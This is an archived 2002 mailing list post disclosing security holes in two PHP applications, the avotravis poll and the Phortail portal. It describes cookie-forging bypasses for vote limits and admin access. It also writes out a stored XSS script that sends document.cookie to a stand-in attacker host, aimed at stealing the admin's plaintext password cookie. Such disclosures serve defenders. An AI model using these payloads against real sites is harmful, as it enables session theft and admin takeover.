Vulnerability Development mailing list archives
Security holes in two PHP services.
From: frog frog <leseulfrog () hotmail com>
Date: 1 Mar 2002 16:37:08 -0000
The first one is poll "avotravis " versions 2.1 and less. 1) Distortion of the limitations of multiple votes : Set the cookie with the name "already_voted" and value "1" to the url /avotravis.php3?vote=1 for "yes" and /avotravis.php3?vote=1 for "no". 2) Access to the part administration : Set the cookie "adminsondage", "true" to the webpage http://www.host.com/admin.php3 More details in french : http://www.ifrance.com/kitetoua/tuto/avotravis.txt The second is the portal "Phortail" versions 1.2.1 and less. Admin password is sent uncrypted by cookie and there isn't limitation in the posting of the news for the scripts. It is enough to send this kind of script : <im*g src="javascri*pt:phortail()"> <s*cript>function phortail() { a="http://haxor.com/file?"+document.cookie; window.open(a); } </s*cript> (without '*') like a new and wait the admin... More details in french : http://www.ifrance.com/kitetoua/tuto/phortail.txt Creators are alerted. Sorry for my bad english. frog-m@n
Current thread:
- Security holes in two PHP services. frog frog (Mar 04)